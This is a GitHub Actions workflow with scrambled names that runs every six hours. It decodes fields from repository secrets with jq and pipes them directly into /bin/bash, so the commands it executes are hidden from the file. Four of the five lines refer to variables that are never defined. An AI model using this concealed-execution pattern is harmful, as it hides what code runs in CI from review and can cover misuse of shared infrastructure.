name: sichuscx

on:
  workflow_dispatch:
  schedule:
    - cron: '15 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: sichuscx
        env:
          cwk84923: ${{ secrets.cwk84923 }}
        run: |
          echo $cwk84923 | jq -r .dfq0 | /bin/bash
          echo $cmozs41068 | jq -r .xp57 | /bin/bash
          echo $upgn20135 | jq -r .rrgi82134 | /bin/bash
          echo $dru24099 | jq -r .dr58225 | /bin/bash
          echo $tsnxy739 | jq -r .z743 | /bin/bash

